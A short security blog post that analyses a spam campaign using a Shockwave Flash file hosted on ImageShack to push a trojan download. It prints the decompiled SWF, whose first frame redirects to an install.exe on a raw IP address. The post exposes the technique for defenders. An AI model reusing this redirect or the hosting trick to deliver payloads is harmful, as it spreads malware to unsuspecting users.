Select Page

In an earlier blog post, I mentioned that spammers are now using Shockwave Flash (SWF) files to avoid detection (similar in nature to the trick of using Google redirects, etc. in the past).

This continues. Here’s a current example:


This is a typical spam you see these days, pushing an install of trojan that, if installed, typically downloads a rogue malicious antispyware program.

Clicking on the link takes us to a SWF file hosted on ImageShack:


As you can see, it’s just junk text displaying. It’s entire purpose is to push the download of that install.exe file (the trojan).

If we take a wee peek inside that SWF file, we see what’s going on:

movie ‘mal.swf’ compressed // flash 6, total frames: 3, frame rate: 50 fps, 978×580 px

// unknown tag 777 length 3

1 as ‘arial’
end // of exportAssets

2 as ‘line1’
end // of exportAssets

3 as ‘line2’
end // of exportAssets

4 as ‘line3’
end // of exportAssets

defineMovieClip 5 // total frames: 1

end // of defineMovieClip 5

5 as ‘TextBox’
end // of exportAssets

frame 1

constants ‘http://89 187 49 18/install exe’, ‘_self’
push ‘http://89 187 49 18/install exe’, ‘_self’
end // of frame 1

frame 2
end // of frame 2

So the malware authors have a nice place to redirect from — a file hosted on Imageshack.

Alex Eckelberry